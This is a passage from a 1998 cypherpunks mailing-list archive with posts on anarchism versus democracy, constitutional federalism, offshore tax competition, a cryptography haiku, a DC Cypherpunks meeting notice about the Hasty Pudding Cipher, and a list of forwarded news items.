	++ mismanagement of a Commie government, but also had a US embargo
	++ against them interfering with the foreign trade that could have
	++ helped pull them out of the hole they were in.  
	++ 
	++ How much of this would go away if either we were anarchist?
	++ Depends on when you suppose it would have changed here,
	++ but even 25 years of US anarchy starting tomorrow would be a 
	++ major help to Central America, by eliminating support for militarism
	++ and by ending the Drug War (though that has more effect on 
	++ Mexico and South America than on Honduras and Guatemala.)
	++ Without the Drug War in the US, prices of cocaine would be
	++ low enough that they wouldn't displace food crops as much,
	++ and marijuana and opium would primarily be grown in the US,
	++ and drugs would probably be legal or near-legal in Latin America,
	++ so there'd be a lot less corruption and violence associated with the
	++ narcotics business, which would leave both hurricane-hit and
	++ non-hurricane-hit parts of Latin America better able to fund recovery.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 17 Nov 1998 01:15:44 +0800
To: cypherpunks@toad.com
Subject: Haiku
Message-ID: <199811161613.RAA08773@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear old method,
Encryption from the old days
Security once

Read block, write block
Quickly through the S boxes
Look, no moving parts

Particle flies
Gas ionizes briefly
Hear a speaker click

Ron's bored today
Security is algebra
Algebra is good

Pretty damn great
Genie out, bottle broken
Privacy for you

--Tasty aliens certified my pugs












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 17 Nov 1998 13:56:25 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811101638.KAA18839@einstein.ssz.com>
Message-ID: <3.0.5.32.19981116173649.008a3d20@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:38 AM 11/10/98 -0600, Jim Choate wrote:
>Your right, let me spell it out. Free-markets as depicted by
>anarcho-whatever theories legitimize theft, physical violence, extortion, etc.

Nonsense.  Governments are the ones who claim legitimacy for
their theft, violence, and extortion.  Free markets consider those things
to be bad, though in some free markets they're for sale anyway.

>They further a priori abandon any precept of social institution and
>leave it all on the shoulder of the individuals. 

Nonsense again.  Social institutions aren't a market issue,
though some services provided by them can also be provided by markets,
i.e. hiring people to do things.  They're a social issue, and 
people will form social institutions to do things if they want.
Absence of coercion doesn't mean absence of cooperation.
Anarchists are perfectly good at having schools, churches,
volunteer fire companies, theater groups, and soup kitchens,
and they still raise their kids, live inside if they want,
do fun things together, and do necessary things together.
Just because you don't have a social institution that announces
that it has the job of killing anybody who competes with it or
fails to obey its proclamations of the will of the majority
doesn't mean you don't have social institutions.

>Additionaly they abandon such concepts of justice, equity, etc. 
>because they describe no mechanism to handle these issues.

You've sure got the cart before the horse here.
Most anarchists I know, whether leftists or libertarians,
care more about justice and equity than any government
I've encountered (maybe not more than the citizens
ruled by the government, but more than the government itself.)
We just don't think a State is a good or likely way to get them,
given too much experience to the contrary, even if some occasional
groups of people have some limited success running a limited government
for short periods of time.

> And finaly, they don't even attempt to recognize
>the international interactions and cultural differences that drive them.

You're building assumptions into your terminology here....
it's only international if you've got nations.
But assuming you mean interactions between groups of people
living in different places who act different, sure,
we recognize them, whether they're across an ocean,
or a Big River, or just across town.  Doesn't mean we can't
peacefully trade with each other, and doesn't mean that some of them
won't occasionally try to rip us off.  

>They make the same mistake as every other form of non-democratic system,
>they assume because it works for one it works for all.

Huh?  I've been told time and time again "This is a democracy,
majority rules, it's America and you'll do it our way,
love it or leave it, conform or we'll beat you up."
Democracy means that other people can tell you what to do,
and if it works for them you'd better hope it works for you
because you're stuck with it.   There are other systems where
smaller groups of people can tell everybody else what to do,
which can be worse than democracy, like monarchies or slave states,
but somehow the purported "limited government" have been
much less limited in theory than in practice, and 
justice and equity are for those people who are more equal than others.

>Not even hardly. At least citizens can change the laws under a democracy.
>Under an anarcho-whatever it is strictly lump it or like it unless you're
>willing to fund a bigger gun.

A bigger gun than Congress can fund with your money and mine?  Wow!

>I'm going to stop now, this particular vein of discussion is bereft of any
>and all positive attributes when one tries to justify slavery and theft.

Wait, did the attributions get switched around here, and this line
wasn't by Jim Choate?  If not, what was your draft card number, Jim?
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 17 Nov 1998 14:00:08 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)
In-Reply-To: <199811111618.KAA24654@einstein.ssz.com>
Message-ID: <3.0.5.32.19981116175329.008a3570@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:18 AM 11/11/98 -0600, Jim Choate wrote:
>Read the 10th again you don't understand what it is saying. 
>
>It *specificaly*[sic] says that unless the Constitution assigns it to the feds
>*or* prohibits it then the states are *exactly* the ones that are able to do
>what Congress is prohibited from doing. The states are limited by their
>own consititions[sic] which are guaranteed to be representative in nature.
>The states absolutely have the right to regulate gun laws
....
>State regulation on speech, press, etc. are also completely constitutional

The 14th supersedes this somewhat; states can't violate 
federal-constitutional rights in ways that they could before it
when they had the 10th to permit them.

> If you don't like your states laws move to one you do like.
>
>That's what it means to live in a democracy, freedom of choice - not
>homogeneity (on this point ol' Alex was wrong, wrong, wrong).

Some freedom of choice - if you don't like what the government forces 
on you, move.  "Democracy" means that if 50% of the people
vote for a system like that, you're stuck with it.
Now, it's certainly better than systems like serfdom or Sovietism,
where you weren't allowed to move either, and it's also better
to have non-homogeneity available nearby.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nilsphone@aol.com
Date: Tue, 17 Nov 1998 08:18:37 +0800
To: cypherpunks@toad.com
Subject: Re: Attempt by UK govt to plug tax hole...
Message-ID: <8125e8d2.3650b1aa@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



NOTE the word "harmful" below, used three times, mainly meaning
"harmful competition by offering lower tax rates".

Now, this is very interesting, if unsurprising. Theoretically, there is no 
particular reason why competition in tax rates, i.e. essentially in the 
provision of government services at a lower price, should be "harmful" in 
any sense differing from competition in supplying any other service.


Naturally, the supplier of a particular service (or product) tends to think 
of competition in his own arena as "harmful", whereas competition in any
other is generally a "public good". This is obviously nothing but self-
serving;
the putative robber barons of the last century presumably thought of 
competiton in petroleum, rail transportation and whatnot as "harmful", as did
United and American when airline service opened to competition some
20 years ago.

What makes the assertions of the British and other G7 governments 
particularly irksome is that they simultanaeously advocate competition
in most areas, except their own, and at the same time make a 
- usually implicit - claim to represent some kind of public good, and 
a claim to holding the moral high ground.

Regards

Nils Andersson

In a message dated 1998-11-16 12:34 Pacific Standard Time, jf_avon@citenet.net
writes:

> 
>  From Caribbean Week, business section, updated Nov. 15 1998 (?)
>  
>  =================================================
>  Global initiatives present challenges to BVI
>  
>  BRITISH VIRGIN ISLANDS - Proposed initiatives created for "combating
>  harmful preferential tax regimes" could present special challenges to 
> offshore
>  financial centres such as the BVI, Chief Minister, Ralph O'Neal has told
the
>  Legislative Council.
>.............
>  the UK
>  Government's resolve to tackle harmful tax competition.........

>  Of the concerns noted by the Chief Minister were OCED initiatives to
counter
>  the spread to tax havens and harmful preferential regimes............




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 17 Nov 1998 08:04:16 +0800
To: "Nilsphone@aol.com>
Subject: Re: Attempt by UK govt to plug tax hole...
Message-ID: <199811162324.SAA26858@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 16 Nov 1998 18:13:46 EST, Nilsphone@aol.com wrote:

>NOTE the word "harmful" below, used three times, mainly meaning
>"harmful competition by offering lower tax rates".

etc.

OK guys, it seems the topic interests you...  :-)

I just thought of dropping it and see what happen... :-)

Please *don't* forget to Cc me if you post only to Cypherpunks since I'm not 
on it anymore.  I'm on e$pam though (e$@vmeng.com)

Ciao

jfa


 " There can be no compromise on basic principles. There can be no compromise on moral issues. There can be no compromise on matters of knowledge, of truth, of rational conviction." -Ayn Rand


"The government has no source of revenue, except the taxes paid by the producers.  To free itself -for a while- from the limits set by reality, the government initiates a credit con game on a scale which the private manipulator could not dream of.  It borrows money from you today, which is to be repaid with money it will borrow from you day after tomorrow, and so on.  This is known as "deficit financing."  It is made possible by the fact that the government cuts the connection between goods and money.  It issues paper money, which is used as a claim check on actually existing goods-but that money is not backed by any goods, it is not backed by gold, it is backed by nothing.  It is a promissory note issued to you in exchange for your goods, to be paid by you (in the form of taxes) out of your future production." 
-Ayn Rand





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Tue, 17 Nov 1998 09:45:47 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the  Foregone (fwd)
In-Reply-To: <v04011709b26f62998043@[206.189.103.230]>
Message-ID: <v04011735b276695bab67@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:50 AM -0500 11/14/98, Bill Stewart wrote:
>At 12:18 PM 11/11/98 -0500, Petro or other people wrote:
>>	Sub-contracting can often lead to cost savings. For instance,
>>instead of each insurer having their own fire station network, they could
>>all share one, and only pay a certain cost-per-subscriber.
>
>Government subcontracting can be yet another excuse for graft and kickbacks
>or it can be an opportunity for the private sector to seriously compete
>for government business, or at least an opportunity to compete for graft :-)
>Sometimes this can save money for the public, though seldom as much
>as letting services be provided by the private sector.

	We weren't talking about Government Contracting (which I'll agree
with you would be politely called a scam), but rather in a crypto-anarchic
enviroment whereby an insurer or several insurers would pay a subcontractor
(the local fire prevention/suppression company).

>>>> 	Looking different is not illegal.
>What's that, white boy?

	It's not illegal for me to die my hair Green and Pick, and wear a
Tutu and black patent leather pumps. In this case, it probably should be,
but isn't.

>>>> 	Thinking different is not illegal.
>Always has been, anywhere, any time....

	Not in any legal book in this country.

>>	Listen Fuckwad:
>>	(1) there are paved roads from one coast to the other, as well as
>>railways.
>>	(3) Most of the roads being built with federal funds are for
>>"congestion  relief", not roads to new places so troops can move.
>
>Of course they are, and everybody's pretty much known it all along,
>but "defense" was the excuse used for having the Feds get into the
>road-building business on a much more massive scale than ever before.
>Much of it corresponded nicely with "urban renewal", the 60s policy
>of making cities more beautiful by replacing black peoples' houses with
>freeways.  Once (white) people got used to freeways, they mostly
>stopped complaining about expenditures, and started complaining that
>they didn't have _their_ freeway yet.

	So it's time for the feds to get out. We can't afford more roads,
and they aren't needed.

>>	The Army. Marines, and National Guard are fully capable of getting
>>whereever they need to go with our without the current highway system, if
>>they weren't they'd be worthless.
>No, but the industrial base that keeps the military functioning
>does benefit from the highway system.

	It benefits far more from the rapidly deteriorating rail system,
and besides, we have enough roads.

>>	(2) There hasn't been a war fought on CONUS since we attacked Mexico.
>Excuse me?  Are you talking about some recent attack on Mexico,
>or are you referring to the Mexican War of 1846?

	Actually, I was thinking of the one that Teddy Rossevelt was in,
unless I have my history confused.

>Or are you contending that the Confederate States weren't part of the
>Contiguous United States, and therefore the Union's ReConquest
>of the South wasn't in CONUS?  Or that the Indian wars in the west
>weren't wars, just Police Actions, or that the various ex-Mexican
>territories weren't States yet, and thus not CONUS?

	If IRC, Roosevelt Attacked (or counterattacked) Mexico in the late
1800's or early 1900's.

	That would have been after the Indian Wars, After the UnCivil War.
Anyway, there hasn't been a war fought on the Main Land USA in a LONG
fucking time, and the next one's going to be another UnCivil war where the
roads will help both sides.

	It's a crap excuse.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 17 Nov 1998 08:42:40 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <v04020a03b2766daaeef7@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Newsgroups: talk.politics.crypto
Date: Mon, 16 Nov 1998 11:28:04 -0500 (EST)
From: "K. M. Ellis" <protozoa@tux.org>
To: protozoa@tux.org
MIME-Version: 1.0
Sender: owner-cryptography@c2.net


Crack open your palm pilots and take note!  And please repost widely.  Our
mailing list (dccp@eff.org), along with the rest of eff.org, is sadly out
of commission.

DC Cypherpunks will hold a meeting at the Electronic Privacy Information
Center office in Washington, DC.

DATE:  Soon!  Saturday, November 21, 1998

TIME:  5pm

Featured speaker:  Richard Schroeppel, University of Arizona
		   rcs@cs.arizona.edu

The Hasty Pudding Cipher

"NIST is organizing the search for a new block cipher, the Advanced
Encryption Standard.  The Hasty Pudding Cipher is my entry in the AES
competition.  The design goals for HPC are medium security, speed, and
flexibility.  Hasty Pudding works with any block length and any key
size.  It is optimized for 64-bit architectures, operating at 200 MHz
on large data blocks.  Hasty Pudding introduces a new feature, Spice,
which allows useful non-expanding encryption of small blocks, even
single bits.  The cipher includes some unusual design principles."


Location:  Electronic Privacy Information Center
	   666 Pennsylvania Ave. SE,
	   at the corner of Pennsylvania and 7th in South East DC
	   Across the street from Eastern Market Metro station (Orange &
  	   Blue Line)

To get into the building, go around to the 7th street side next to the
flower shop and use the call box to call the EPIC office.  We'll buzz you
in.

True to DCCP form, we'll probably hit a local resturaunt afterwards for
dinner.

If you need more explicit directions, please contact Kathleen Ellis at
(202)298-0833 or ellis@epic.org.

For more information about the DC Cypherpunks, see our web page at
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 17 Nov 1998 12:38:03 +0800
To: "'Cypherpunks Distributed Remailer'" <cypherpunks@EINSTEIN.ssz.com>
Subject: RE: Question about anarchic systems and natural disasters (fwd)
In-Reply-To: <199811161315.HAA10512@einstein.ssz.com>
Message-ID: <000401be11e0$df151580$368195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Jim Choate:

: The question was how would an anarchic system work in this respect, not how
: do governments, relief organizations, and the general public act now.
................................................


The answer is that you cannot know in advance.   Since anarchies are not formal
societies, there would exist no centralized formal structures, so therefore such
behavior cannot be predicted.   Responses to emergeny situations would depend
upon the psychology of those who are living in anarchy.  Predicting how they
would "work", when no one is coerced to function, requires imagining the
potential for normal responses available to those who are free from remote
control, who can decide for themselves whether they care, and what they're going
to do about it, if anything.


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 17 Nov 1998 11:45:51 +0800
To: cypherpunks@cyberpass.net
Subject: vznuri
Message-ID: <199811170312.WAA16677@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



The cypherpunks list, believe it or not.
---guy

Vladimir Z. Nuri   Mon Sep 28 20:36  321/17595 IP: The virtual president
Vladimir Z. Nuri   Mon Sep 28 20:36   79/3123  IP: NATIONAL ID
Vladimir Z. Nuri   Mon Sep 28 20:36  223/9504  IP: Military's secret pla
Vladimir Z. Nuri   Wed Sep 30 00:29  143/6354  IP: NSA listening practic
Vladimir Z. Nuri   Wed Sep 30 00:29  105/4741  IP: Senate Passes Y2K Lia
Vladimir Z. Nuri   Wed Sep 30 00:29  112/5414  IP: Fwd: [Spooks] CIA Ope
Vladimir Z. Nuri   Wed Sep 30 00:36   99/3988  IP: Fwd: [Spooks] NSA All
Vladimir Z. Nuri   Wed Sep 30 00:54  141/6335  IP: [FP] National registr
Vladimir Z. Nuri   Wed Sep 30 01:01  110/4767  IP: Group 'No Privacy for
Vladimir Z. Nuri   Wed Sep 30 18:08  110/4714  IP: Secret Courts Approve
Vladimir Z. Nuri   Wed Sep 30 18:23  100/4856  IP: Army goes offline in 
Vladimir Z. Nuri   Wed Sep 30 18:25  110/4919  IP: Chinese Govt Bans Con
Vladimir Z. Nuri   Wed Sep 30 18:41  112/5126  IP: Attn Should Turn to '
Vladimir Z. Nuri   Wed Sep 30 18:55  118/5374  IP: Secrecy might be weak
Vladimir Z. Nuri   Wed Sep 30 19:00  127/5446  IP: Navy investigating GS
Vladimir Z. Nuri   Wed Sep 30 19:01  124/5481  IP: Courts OK record numb
Vladimir Z. Nuri   Wed Sep 30 19:23  112/5938  IP: Innovative Approach t
Vladimir Z. Nuri   Wed Sep 30 19:27  169/7133  IP: FW: Release: seizing 
Vladimir Z. Nuri   Wed Sep 30 19:32  308/15711 IP: Big Brother Is Monito
Vladimir Z. Nuri   Wed Sep 30 19:40  655/38595 IP: The Great Superterror
Vladimir Z. Nuri   Thu Oct  1 20:04  712/29029 IP: [Part 1 & 2] THE IMPE
Vladimir Z. Nuri   Thu Oct  1 20:17  129/5442  IP: Clear and present dan
Vladimir Z. Nuri   Thu Oct  1 20:50  221/8585  IP: Europe's Echelon eave
Vladimir Z. Nuri   Sat Oct  3 19:49  189/8609  IP: ISPI Clips 5.11: Cana
Vladimir Z. Nuri   Sat Oct  3 19:49  201/9263  IP: ISPI Clips 5.9: Canad
Vladimir Z. Nuri   Sat Oct  3 20:07  165/7272  IP: ISPI Clips 5.10: 'Dea
Vladimir Z. Nuri   Sat Oct  3 20:18  174/8292  IP: Got a Cause and a Com
Vladimir Z. Nuri   Sat Oct  3 20:23  154/7268  IP: CNS - Justice Departm
Vladimir Z. Nuri   Sat Oct  3 20:37  233/11556 IP: Wired News - The Gold
Vladimir Z. Nuri   Sat Oct  3 20:41  260/11948 IP: ISPI Clips 5.12: New 
Vladimir Z. Nuri   Sat Oct  3 20:43  533/25290 IP: ISPI Clips 5.13: Iden
Vladimir Z. Nuri   Tue Oct  6 23:51  163/7361  IP: Cyberwar: Proper Vigi
Vladimir Z. Nuri   Tue Oct  6 23:51  114/5057  IP: "The Internet 1998: T
Vladimir Z. Nuri   Tue Oct  6 23:51  165/6251  IP: Did EU Scuttle Echelo
Vladimir Z. Nuri   Tue Oct  6 23:52  191/8744  IP: Heavy Leonid meteor s
Vladimir Z. Nuri   Tue Oct  6 23:52  161/8036  IP: Fwd: [Spooks] CIA nee
Vladimir Z. Nuri   Wed Oct  7 00:20  227/8036  IP: ISPI Clips 5.15:Priva
Vladimir Z. Nuri   Wed Oct  7 00:21  200/9659  IP: "Big Brother" Watches
Vladimir Z. Nuri   Wed Oct  7 00:22  148/5787  IP: New Surveillance Face
Vladimir Z. Nuri   Wed Oct  7 00:59  273/10144 IP: SOROS: Must have econ
Vladimir Z. Nuri   Wed Oct  7 01:00  287/14344 IP: Worth Reading: Fwd fr
Vladimir Z. Nuri   Wed Oct  7 01:09  509/21869 IP: Spycam City: The surv
Vladimir Z. Nuri   Wed Oct  7 01:14  472/21014 IP: Y2K- a futurist view:
Vladimir Z. Nuri   Thu Oct  8 17:38   65/2984  IP: Borderless World Talk
Vladimir Z. Nuri   Thu Oct  8 17:40  214/10771 IP: ISPI Clips 5.26: Coal
Vladimir Z. Nuri   Fri Oct  9 21:34  181/8420  IP: Canadian Military Rea
Vladimir Z. Nuri   Fri Oct  9 21:34  366/18076 IP: ISPI Clips 5.29: What
Vladimir Z. Nuri   Fri Oct  9 21:34  171/8006  IP: Privacy, Other Issues
Vladimir Z. Nuri   Sun Oct 11 01:46  129/7274  IP: This Country *Needs* 
Vladimir Z. Nuri   Sun Oct 11 01:46  124/5312  IP: Different Approaches 
Vladimir Z. Nuri   Sun Oct 11 01:46  201/8911  IP: Oops! Police Fire Tea
Vladimir Z. Nuri   Sun Oct 11 01:46   95/4639  IP: A Poll / A Thousand L
Vladimir Z. Nuri   Sun Oct 11 01:46  133/6607  IP: Congress Poised To Ap
Vladimir Z. Nuri   Mon Oct 12 18:39  128/6122  IP: Tracking: Machines to
Vladimir Z. Nuri   Mon Oct 12 18:39  174/7869  IP: ISPI Clips 5.30: U.S.
Vladimir Z. Nuri   Mon Oct 12 18:44  144/6372  IP: Secret Marine trainin
Vladimir Z. Nuri   Tue Oct 13 18:10  259/13402 IP: Tracking: NYT on FBI'
Vladimir Z. Nuri   Tue Oct 13 18:11   76/3376  IP: Tracking: F.B.I.'s ne
Vladimir Z. Nuri   Tue Oct 13 18:16  210/9713  IP: Privacy Fears: FBI's 
Vladimir Z. Nuri   Tue Oct 13 18:26  209/9563  IP: ISPI Clips 5.32: FBI 
Vladimir Z. Nuri   Tue Oct 13 18:30  256/14040 IP: Fw: Every word on the
Vladimir Z. Nuri   Tue Oct 13 18:48  323/16174 IP: ISPI Clips 5.35: F.B.
Vladimir Z. Nuri   Tue Oct 13 19:11  420/17694 IP: "The Billion Dollar T
Vladimir Z. Nuri   Tue Oct 13 19:17  784/37858 IP: FBI Intentionally Obs
Vladimir Z. Nuri   Wed Oct 14 16:29  175/7603  IP: ISPI Clips 5.42: Poll
Vladimir Z. Nuri   Wed Oct 14 16:29  110/4572  IP: Fwd: 10/13/98 MSNBC S
Vladimir Z. Nuri   Wed Oct 14 16:30  148/6224  IP: Surveillance: Candid 
Vladimir Z. Nuri   Wed Oct 14 16:34  220/9929  IP: ISPI Clips 5.38: TRUS
Vladimir Z. Nuri   Wed Oct 14 16:36  233/11213 IP: The Road to Biometric
Vladimir Z. Nuri   Fri Oct 16 01:47   72/3457  IP: ** National ID Alert 
Vladimir Z. Nuri   Fri Oct 16 01:47   53/2539  IP: HOUSE APPROVES Y2K BI
Vladimir Z. Nuri   Fri Oct 16 01:47   61/2964  IP: ISP not liable for cu
Vladimir Z. Nuri   Fri Oct 16 18:19  167/8226  IP: Silent Weapon of Mass
Vladimir Z. Nuri   Fri Oct 16 18:20  208/9472  IP: ISPI Clips 5.47: High
Vladimir Z. Nuri   Fri Oct 16 18:19  167/8226  IP: Silent Weapon of Mass
Vladimir Z. Nuri   Fri Oct 16 18:20  208/9472  IP: ISPI Clips 5.47: High
Vladimir Z. Nuri   Sat Oct 17 20:45   92/4345  IP: FBI Says Some U.S. Ci
Vladimir Z. Nuri   Sat Oct 17 20:45  167/9391  IP: ATTN: Does Any Listee
Vladimir Z. Nuri   Sat Oct 17 20:45  116/5722  IP: One-Stop Shopping for
Vladimir Z. Nuri   Sat Oct 17 20:45   99/5051  IP: Tracking: Bar Codes/E
Vladimir Z. Nuri   Sat Oct 17 20:46  202/9270  IP: ISPI Clips 5.49: More
Vladimir Z. Nuri   Sat Oct 17 20:50  134/6125  IP: FCC To Propose Resolv
Vladimir Z. Nuri   Sat Oct 17 21:07  178/8868  IP: ISPI Clips 5.51: Your
Vladimir Z. Nuri   Sat Oct 17 21:24  268/13202 IP: ISPI Clips 5.50: Nati
Vladimir Z. Nuri   Sun Oct 18 22:20   94/4275  IP: Fwd: Evaluation of Ve
Vladimir Z. Nuri   Sun Oct 18 22:21  102/5080  IP: 'Intelligent' compute
Vladimir Z. Nuri   Sun Oct 18 22:24  123/6385  IP: Tracking: Plastic Pas
Vladimir Z. Nuri   Sun Oct 18 22:27  140/5480  IP: High-tech Anti-crime 
Vladimir Z. Nuri   Sun Oct 18 23:02  102/5080  IP: 'Intelligent' compute
Vladimir Z. Nuri   Mon Oct 19 21:10  212/9989  IP: Brave New World of Im
Vladimir Z. Nuri   Mon Oct 19 21:12  178/5676  IP: WEBSITE: Military Ope
Vladimir Z. Nuri   Mon Oct 19 23:25  234/12001 IP: [FP] National ID back
Vladimir Z. Nuri   Tue Oct 20 17:40   52/2531  IP: Privacy Under Threat
Vladimir Z. Nuri   Tue Oct 20 17:41  132/6655  IP: Former FBI Workers Fi
Vladimir Z. Nuri   Tue Oct 20 17:42  194/9676  IP: Privacy Rules Send U.
Vladimir Z. Nuri   Tue Oct 20 17:45  203/8763  IP: Biometric Weekly: 10-
Vladimir Z. Nuri   Fri Oct 23 04:12  162/7357  IP: Enhanced Ability to T
Vladimir Z. Nuri   Sun Oct 25 01:42  135/6658  IP: FCC Proposes Rules fo
Vladimir Z. Nuri   Sun Oct 25 01:42  101/5154  IP: Senate Passes Forward
Vladimir Z. Nuri   Tue Oct 27 22:21  226/9958  IP: CIA admits drug traff
Vladimir Z. Nuri   Tue Oct 27 22:22  177/8405  IP: 'Grass-Roots' Lobbyis
Vladimir Z. Nuri   Tue Oct 27 22:23  273/13170 IP: ISPI Clips 5.69: EU L
Vladimir Z. Nuri   Tue Oct 27 22:23  542/22831 IP: Bioterrorism: America
Vladimir Z. Nuri   Tue Oct 27 22:23  180/8338  IP: ISPI Clips 5.68: No D
Vladimir Z. Nuri   Tue Oct 27 22:23  117/5569  IP: [FP] Microsoft puts s
Vladimir Z. Nuri   Tue Oct 27 22:23  166/7339  IP: Cell phone tapping st
Vladimir Z. Nuri   Tue Oct 27 22:25  159/6947  IP: Europe May Block Flow
Vladimir Z. Nuri   Wed Oct 28 23:28   52/2440  IP: Electronic March
Vladimir Z. Nuri   Wed Oct 28 23:40  101/4255  IP: Congress to Get Echel
Vladimir Z. Nuri   Thu Oct 29 00:03   54/2733  IP: Crypt Wars, UK-Style
Vladimir Z. Nuri   Thu Oct 29 00:08   79/3609  IP: No dirty trick, just 
Vladimir Z. Nuri   Thu Oct 29 00:12  128/5724  IP: Wanted: Y2K Workers
Vladimir Z. Nuri   Thu Oct 29 00:22  121/5855  IP: DNA bank launched as 
Vladimir Z. Nuri   Thu Oct 29 00:23  151/8666  IP: ECHELON: America's Sp
Vladimir Z. Nuri   Thu Oct 29 00:58  868/39860 IP: New Evidence Exposes 
Vladimir Z. Nuri   Fri Oct 30 04:14  120/5665  IP: One Million Sign Peti
Vladimir Z. Nuri   Fri Oct 30 04:14  204/9156  IP: FCC Proposes Location
Vladimir Z. Nuri   Fri Oct 30 20:25  180/8027  IP: Internet Allows Lies 
Vladimir Z. Nuri   Fri Oct 30 20:25  264/14432 IP: Cyber force behind pr
Vladimir Z. Nuri   Fri Oct 30 20:26  104/4335  IP: Thousands to Demand R
Vladimir Z. Nuri   Mon Nov  2 18:57  249/12405 IP: 18-year-old rebels ag
Vladimir Z. Nuri   Mon Nov  2 19:22  118/4744  IP: Anthrax Scare
Vladimir Z. Nuri   Mon Nov  2 19:31   93/5005  IP: Sen. Moynihan Warns o
Vladimir Z. Nuri   Mon Nov  2 19:54  112/5461  IP: Privacy: Dangers of s
Vladimir Z. Nuri   Mon Nov  2 20:03  125/5556  IP: [FP] R 141331Z-OCT-98
Vladimir Z. Nuri   Mon Nov  2 20:05  119/5754  IP: More clinics receive 
Vladimir Z. Nuri   Mon Nov  2 20:12  152/6895  IP: FBI: Anthrax Threat L
Vladimir Z. Nuri   Mon Nov  2 20:30  162/7955  IP: ISPI Clips 6.03: Priv
Vladimir Z. Nuri   Mon Nov  2 20:41  175/8944  IP: Farah: The cops are o
Vladimir Z. Nuri   Mon Nov  2 21:04  346/18519 IP: [FP] The DoD DNA Regi
Vladimir Z. Nuri   Mon Nov  2 21:05  625/27262 IP: Fatal Flaws: How mili
Vladimir Z. Nuri   Wed Nov  4 16:40  174/7874  IP: ISPI Clips 6.05: U. o
Vladimir Z. Nuri   Wed Nov  4 16:47  307/15045 IP: [FP] L.A. DMV Tries t
Vladimir Z. Nuri   Sat Nov  7 16:39  176/8125  IP: ISPI Clips 6.14: Anon
Vladimir Z. Nuri   Sat Nov  7 17:44  256/9577  IP: Crunch Time for Y2K S
Vladimir Z. Nuri   Sat Nov  7 17:45  472/23537 IP: TOTALITARIAN TECHNOLO
Vladimir Z. Nuri   Sat Nov  7 17:45  120/5526  IP: Discover Alien Life W
Vladimir Z. Nuri   Sat Nov  7 17:45  162/7283  IP: ISPI Clips 6.10: Wash
Vladimir Z. Nuri   Sat Nov  7 17:45  170/7785  IP: ISPI Clips 6.17: FCC 
Vladimir Z. Nuri   Mon Nov  9 00:44  141/6402  IP: [FP] Free-Market.Net 
Vladimir Z. Nuri   Mon Nov  9 00:44  193/9192  IP: Privacy Int'l Big Bro
Vladimir Z. Nuri   Mon Nov  9 00:44  257/12935 IP: [FP] Your Banker, the
Vladimir Z. Nuri   Mon Nov  9 17:17  173/8091  IP: NSA Threatens To "OUT
Vladimir Z. Nuri   Tue Nov 10 18:33   81/4565  IP: Clinton Wants Loophol
Vladimir Z. Nuri   Tue Nov 10 20:15  130/6154  IPINFO: Re: IP: Clinton W
Vladimir Z. Nuri   Thu Nov 12 20:25   55/2703  IP: World's biggest hard 
Vladimir Z. Nuri   Thu Nov 12 20:29  113/4701  IP: WiredNews: Virus Thri
Vladimir Z. Nuri   Thu Nov 12 20:35  166/7882  IP: [FP] Scanner picks ou
Vladimir Z. Nuri   Thu Nov 12 20:50  185/9136  IP: Clinton Point-Man on 
Vladimir Z. Nuri   Thu Nov 12 21:21  218/9416  IP: Push for hearings on 
Vladimir Z. Nuri   Thu Nov 12 21:22  209/9636  IP: ISPI Clips 6.28: Wire
